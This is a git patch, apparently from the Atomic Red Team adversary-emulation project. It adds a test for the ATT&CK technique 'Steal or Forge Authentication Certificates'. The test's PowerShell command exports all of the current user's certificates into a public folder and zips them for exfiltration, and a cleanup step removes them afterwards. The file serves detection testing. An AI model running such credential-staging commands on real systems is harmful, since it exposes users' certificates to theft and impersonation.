From 4759bb96c79aba4fc16b135bf4ddc6f0e9e56c20 Mon Sep 17 00:00:00 2001
From: 0xv1n <11021725+0xv1n@users.noreply.github.com>
Date: Mon, 24 Apr 2023 20:35:54 -0400
Subject: [PATCH] T1649 Test (#2400)

* t1649

* Update T1649.yaml

* simplification and create directories

---------

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1649/T1649.yaml | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 atomics/T1649/T1649.yaml

diff --git a/atomics/T1649/T1649.yaml b/atomics/T1649/T1649.yaml
new file mode 100644
index 00000000..30dc7ad8
--- /dev/null
+++ b/atomics/T1649/T1649.yaml
@@ -0,0 +1,21 @@
+attack_technique: T1649
+display_name: 'Steal or Forge Authentication Certificates'
+atomic_tests:
+- name: Staging Local Certificates via Export-Certificate
+  description: |
+    Export all user certificates and add to a compressed archive.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $archive="$env:PUBLIC\T1649\atomic_certs.zip"
+      $exfilpath="$env:PUBLIC\T1649\certs"
+      Add-Type -assembly "system.io.compression.filesystem"
+      Remove-Item $(split-path $exfilpath) -Recurse -Force -ErrorAction Ignore
+      mkdir $exfilpath | Out-Null
+      foreach ($cert in (gci Cert:\CurrentUser\My)) { Export-Certificate -Cert $cert -FilePath $exfilpath\$($cert.FriendlyName).cer}
+      [io.compression.zipfile]::CreateFromDirectory($exfilpath, $archive)
+    cleanup_command: |
+      $exfilpath="$env:PUBLIC\T1649\certs"
+      Remove-Item $(split-path $exfilpath) -Recurse -Force -ErrorAction Ignore
+    name: powershell